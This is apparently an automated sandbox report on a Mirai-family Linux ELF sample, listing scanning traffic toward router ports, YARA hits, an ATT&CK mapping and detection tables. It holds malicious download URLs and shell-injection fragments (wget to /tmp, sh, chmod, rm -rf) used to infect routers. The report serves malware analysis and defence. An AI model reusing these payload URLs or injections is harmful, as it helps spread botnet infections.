Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53206 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37686 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41060 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53298 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37780 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47132 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41154 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38148 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45204 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47236 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47132
Source: unknown	Network traffic detected: HTTP traffic on port 45224 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 47236
Source: unknown	Network traffic detected: HTTP traffic on port 36432 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56454 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56464 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36536 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60288 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 32984 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36552 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57700 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40996 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36530 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45278 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55052 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55086 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59830 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34456 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45316 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56454 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56464 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34514 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59884 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34456
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 34514
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49432 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55380 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 35920 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 53148 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53416 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53148 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55520 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 53148
Source: unknown	Network traffic detected: HTTP traffic on port 56160 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56230 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47558 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36290 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 47566 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 43138 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37654 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 34714 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36362 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 36290
Source: unknown	Network traffic detected: HTTP traffic on port 43148 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53162 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56164 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56090
Source: unknown	Network traffic detected: HTTP traffic on port 34728 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57030 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 53162
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56164
Source: unknown	Network traffic detected: HTTP traffic on port 49432 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 36362
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37654 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 57082 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44704 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57344 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55742 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38160 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44720 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34348 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 57370 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55768 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53416 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37654 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 59228 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59228 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59360 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46382 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44530 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44538 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53416 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36340 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36364 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51406 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57774 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49432 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 37654 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55844 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51424 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51406
Source: unknown	Network traffic detected: HTTP traffic on port 46390 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57792 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55868 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 55844
Source: unknown	Network traffic detected: HTTP traffic on port 46382 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51424
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 55868
Source: unknown	Network traffic detected: HTTP traffic on port 34090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56670 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49384 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59100 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46454 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56728 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56670
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59162 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53558 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 56728
Source: unknown	Network traffic detected: HTTP traffic on port 53584 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49384 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41172 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49392 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41242 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53426 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51796 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41172 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 53502 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51874 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51796
Source: unknown	Network traffic detected: HTTP traffic on port 51544 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41242 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46602 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 46616 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39192 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33260 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39204 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33272 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56614 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56628 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41172 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37778 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48398 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41242 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36586 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 48456 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48398
Source: unknown	Network traffic detected: HTTP traffic on port 36626 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39488 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39230 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 55960 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 53010 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 32834 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36638 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56868 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 48456
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34626 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 37654 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 60632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53416 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 33742 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56884 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 57504 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54062 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 54066 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41172 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41242 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50940 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44832 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44866 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40684 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60388 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 60388
Source: unknown	Network traffic detected: HTTP traffic on port 60418 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 60418
Source: unknown	Network traffic detected: HTTP traffic on port 49432 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42440 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55548 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56370 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 55548
Source: unknown	Network traffic detected: HTTP traffic on port 56442 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55582 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 45534 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 34090 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52662 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 55582
Source: unknown	Network traffic detected: HTTP traffic on port 42440 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 42510 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59264 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 55112 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 59290 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59264
Source: unknown	Network traffic detected: HTTP traffic on port 55140 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 52678 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41134 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36776 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 36780 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41194 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 59290
Source: unknown	Network traffic detected: HTTP traffic on port 41172 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 41242 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37186 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 34170 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40580 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 40410 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40754 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 60742 -> 8081
Source: unknown	Network traffic detected: HTTP traffic on port 38872 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40784 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39552 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 38882 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38872
Source: unknown	Network traffic detected: HTTP traffic on port 39572 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 39552
Source: unknown	Network traffic detected: HTTP traffic on port 40308 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 39572
Source: unknown	Network traffic detected: HTTP traffic on port 48196 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48198 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51246 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 38882
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 51280 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51246
Source: unknown	Network traffic detected: HTTP traffic on port 38212 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40784 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 40580 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 51280
Source: unknown	Network traffic detected: HTTP traffic on port 50942 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58492 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58480 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39894 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 37760 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44284 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 39906 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 56344 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 44296 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 50456 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 7547 -> 50442
Source: unknown	Network traffic detected: HTTP traffic on port 37760 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58492 -> 7547
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 7547

Source: /sbin/ip6tables (PID: 6279)

Modprobe: /sbin/modprobe -> /sbin/modprobe ip6_tables

Jump to behavior

Source: /tmp/4lXTg8P7Ih.elf (PID: 6225)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 6279)	Queries kernel information via 'uname':			Jump to behavior

Source: 4lXTg8P7Ih.elf, 6225.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6479.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6483.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6486.1.00007fffde829000.00007fffde84a000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: 4lXTg8P7Ih.elf, 6225.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6479.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6483.1.00007fffde829000.00007fffde84a000.rw-.sdmp, 4lXTg8P7Ih.elf, 6486.1.00007fffde829000.00007fffde84a000.rw-.sdmp	Binary or memory string: <x86_64/usr/bin/qemu-sh4/tmp/4lXTg8P7Ih.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/4lXTg8P7Ih.elf
Source: 4lXTg8P7Ih.elf, 6225.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6479.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6483.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6486.1.00005563bee42000.00005563beea5000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: 4lXTg8P7Ih.elf, 6225.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6479.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6483.1.00005563bee42000.00005563beea5000.rw-.sdmp, 4lXTg8P7Ih.elf, 6486.1.00005563bee42000.00005563beea5000.rw-.sdmp	Binary or memory string: cU5!/etc/qemu-binfmt/sh4
Source: 4lXTg8P7Ih.elf, 6479.1.00007fffde829000.00007fffde84a000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4lXTg8P7Ih.elf, type: SAMPLE
Source: Yara match	File source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6225, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6486, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4lXTg8P7Ih.elf, type: SAMPLE
Source: Yara match	File source: 6225.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.00007f8c6c400000.00007f8c6c424000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6225, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4lXTg8P7Ih.elf PID: 6486, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Systemd Service	1 Systemd Service	1 Disable or Modify System Firewall	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Kernel Modules and Extensions	Rootkit	LSASS Memory	1 System Network Configuration Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Kernel Modules and Extensions	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4lXTg8P7Ih.elf	66%	ReversingLabs	Linux.Trojan.Mirai
4lXTg8P7Ih.elf	62%	Virustotal		Browse
4lXTg8P7Ih.elf	100%	Avira	LINUX/Mirai.bonb

Dropped Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
z.hxhk.cc	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://z.hxhk.cc/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20jno%27/&sessionKey=1039230114	100%	Avira URL Cloud	malware
http://z.hxhk.cc/sys64.arm7;chmod	100%	Avira URL Cloud	malware
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+	0%	Avira URL Cloud	safe
http://z.hxhk.cc/gpon443	100%	Avira URL Cloud	malware
http://127.0.0.1/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+	0%	Virustotal		Browse
http://z.hxhk.cc/comtrend%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20jno%27/&sessionKey=1039230114	5%	Virustotal		Browse
http://127.0.0.1/cgi-bin/ViewLog.asp	1%	Virustotal		Browse
http://z.hxhk.cc/sys64.mpsl;chmod	100%	Avira URL Cloud	malware
http://z.hxhk.cc/sys64.mips;	100%	Avira URL Cloud	malware
http://z.hxhk.cc/sys64.mips	100%	Avira URL Cloud	malware
http://z.hxhk.cc/sys64.arm7;chmod	5%	Virustotal		Browse
http://z.hxhk.cc/sys64.x86	100%	Avira URL Cloud	malware
http://127.0.0.1:7547/UD/act?1	0%	Avira URL Cloud	safe
http://z.hxhk.cc/adb;	100%	Avira URL Cloud	malware
http://z.hxhk.cc/sys64.mips;	5%	Virustotal		Browse
http://z.hxhk.cc/sys64.mips	13%	Virustotal		Browse
http://z.hxhk.cc/gpon443	5%	Virustotal		Browse
http://z.hxhk.cc/sys64.x86	5%	Virustotal		Browse
http://127.0.0.1:7547/UD/act?1	1%	Virustotal		Browse
http://z.hxhk.cc/adb;	5%	Virustotal		Browse
http://z.hxhk.cc/sys64.mpsl;chmod	5%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
z.hxhk.cc	31.220.3.125	true	false	6%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1/cgi-bin/ViewLog.asp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://127.0.0.1:7547/UD/act?1	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
